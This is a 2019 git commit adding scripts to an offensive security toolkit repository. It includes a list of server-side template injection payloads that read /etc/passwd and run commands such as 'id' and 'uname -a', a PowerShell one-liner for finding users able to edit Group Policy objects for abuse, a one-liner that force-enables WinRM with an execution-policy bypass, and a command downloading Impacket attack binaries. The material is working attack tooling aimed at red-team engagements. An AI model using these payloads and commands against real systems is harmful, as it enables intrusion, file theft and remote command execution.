Dropped a bunch of various scripts.

This commit is contained in:
mb 2019-01-29 05:19:12 -05:00
parent e839e64db2
commit 1bf88bef0b
9 changed files with 105 additions and 1 deletions

View File

@ -5,4 +5,6 @@
- **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da)) - **`encrypt.rb`** - Simple File Encryption utility (with support for Blowfish, GOST, IDEA, AES) capable of encrypting directories. ([gist](https://gist.github.com/mgeeky/751c01c4dac99871f4da))
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98)) - **`playRTPStream.sh`** - Using rtpdump to play RTP streams from PCAP files with VLC. This script was useful to extract RTP Streams from sniffed VoIP communication and then with a help of VLC to dump those streams into valid .wav files. (https://github.com/hdiniz/rtpdump). [gist](https://gist.github.com/mgeeky/0b8bd81a3f6fb70eec543bc0bae2f079)
- **`xor-key-recovery.py`** - Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length - it searches for proper key that could decrypt cipher into text. ([gist](https://gist.github.com/mgeeky/589b2cf781901288dfea0894a780ff98))

45
others/playRTPStream.sh Normal file
View File

@ -0,0 +1,45 @@
#!/bin/bash
rtpdump_bin=/home/user/tools/rtpdump/rtpdump
if (( $# < 2 )); then
echo
echo This script tries to extract RTP streams from PCAP file using
echo https://github.com/hdiniz/rtpdump
echo utility and passing that stream to VLC player, or to output file.
echo
#echo "Usage: playStream.sh <file> <streamNum> [outfile]"
echo "Usage: playStream.sh <file> <streamNum>"
echo
echo " file - pcap file to process."
echo " streamNum - number of stream to play, or '-l' to list them."
#echo " outfile - (optional) path to output file where to dump that stream."
echo
exit 1
fi
file=$1
num=$2
vlc_bin=cvlc
if [ "$num" == "-l" ]; then
$rtpdump_bin streams $file
else
if (( $# > 2 )); then
echo "[ERROR] Not implemented at the moment."
#outfile=$3
#echo "[Step 1]: Dumping RTP stream ($num) to file ($outfile)"
#nc -nlp 4444 127.0.0.1 > $outfile &
#echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
#echo "[Step 2]: File: $outfile written."
else
echo "[Step 1]: Starting VLC on 0.0.0.0:4444"
$vlc_bin rtp://@0.0.0.0:4444 2> /dev/null &disown;
echo "[Step 2]: Playing RTP stream ($num) on 0.0.0.0:4444"
echo $num | $rtpdump_bin play --host 0.0.0.0 --port 4444 $file > /dev/null
pkill vlc
fi
fi

View File

@ -0,0 +1 @@
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | %{$acl=$_; $a=[string]$acl.IdentityReference; $b=$a.Substring($a.IndexOf("\")+1); $c=$null; $c=Get-NetUser "$b"; If ($c -ne $null -And $c.userprincipalname -like "*") { $dn=$acl.ObjectDN; If($dn -match 'CN=({[0-9A-F\-]+}),.+'){ $cn=$matches[1]; $gpo=Get-NetGPO -GPOname "$cn"; Write-Output "User: $b / $($c.userprincipalname) - delegated to GPO: $($gpo.displayname)"}}}

View File

@ -66,6 +66,8 @@ Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results. Loaded $UserHunterShowAll results.
``` ```
- **`Find-GPODelegatedUsers.ps1`** - One-liner for finding GPO Delegated users that can Edit Settings of that GPO and thus could be used to Abuse GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). [gist](https://gist.github.com/mgeeky/5843df09607123772a61e782a6406d54)
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb)) - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
Example output **not minimized**: Example output **not minimized**:

4
web/payloads/README.md Normal file
View File

@ -0,0 +1,4 @@
## Web Applications penetration testing related PAYLOADS that are actually useful
- **`Server-Side-Template-Injections.txt`** - Various Server-Side Template Injection static payloads, targeting couple of various templating implementations (also some of the Client-Side ones like in AngularJS). The evaluated expression to look/grep for is: **1868686868**. Use it with Burp Intruder's Grep functionality, or simply look out for that pattern while hanging around the application. ([gist](https://gist.github.com/mgeeky/2b660ab8d3946eec519731ed9ec5d25b))

View File

@ -0,0 +1,45 @@
##### LOOK FOR 1868686868
<%= 666 * 666 %>
<%= File.open('/etc/passwd').read %>
${36692*50929}
aaaaaaaaaaaaaaaaaaaaaa{*cccccccccccccccccccccccccccccccc*}bbbbbbbbbbbbbbbbbbbbbbbbb
${"aaaaaaaaaaaaaaaaaaaaaa".join("bbbbbbbbbbbbbbbbbbbbbbbbb")}
${36692*'50929'}
${{36692*50929}}
${{36692*'50929'}}
{{36692*'50929'}}
{{36692*50929}}
[[36692*50929]]
${{36692*50929}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
{{self}}
{php}echo 36692*50929;{/php}
{{velocity}}36692*50929;{{/velocity}}
{{python}}36692*50929;{{/python}}
<#assign
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
= root
= 36692 * 50929
<% x=36692*50929 %>${x}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
aaaaaaaaaaaaaaaaaaaaaa{{''.__class__.__mro__[2].__subclasses__()[233]}}bbbbbbbbbbbbbbbbbbbbbbbbb
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("uname+-a")}}
$class
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo
#set( $foo = "aaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbb") $foo.class
${fffffffffffffffffffffff}
{{ffffffffffffffffffff}}
[[ffffffffffffffffffffff]]
{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

View File

@ -0,0 +1 @@
Set-ExecutionPolicy -ExecutionPolicy Bypass ; Start-Service winrm ; Get-NetConnectionProfile | Set-NetConnectionProfile -NetworkCategory Private ; Enable-PSRemoting -SkipNetworkProfileCheck -Force ; winrm quickconfig ; Configure-SMRemoting -Force -Enable

View File

@ -3,6 +3,8 @@
- **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794)) - **`awareness.bat`** - Little and quick Windows Situational-Awareness set of commands to execute after gaining initial foothold (coming from APT34: https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html ) ([gist](https://gist.github.com/mgeeky/237b48e0bb6546acb53696228ab50794))
- **`Force-PSRemoting.ps1`** - Forcefully enable WinRM / PSRemoting. [gist](https://gist.github.com/mgeeky/313c22def5c86d7a529f41e5b6ff79b8)
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9)) - **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
Steps are following: Steps are following:
@ -16,6 +18,7 @@
After those steps - the GlobalProtect will disable itself cleanly. After those steps - the GlobalProtect will disable itself cleanly.
From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service). From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service).
- **`impacket-binaries.sh`** - Simple one-liner that downloads all of the Windows EXE impacket binaries put out in [Impacket Binaries](https://github.com/ropnop/impacket_static_binaries) repo. [gist](https://gist.github.com/mgeeky/2f990f14f1e7cf78fce21b8761234604)
- **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9)) - **`pth-carpet.py`** - Pass-The-Hash Carpet Bombing utility - trying every provided hash against every specified machine. ([gist](https://gist.github.com/mgeeky/3018bf3643f80798bde75c17571a38a9))

View File

@ -0,0 +1 @@
curl -s https://api.github.com/repos/ropnop/impacket_static_binaries/releases/latest | grep "browser_download_url.*exe" | cut -d : -f 2,3 | tr -d \" | wget -qi -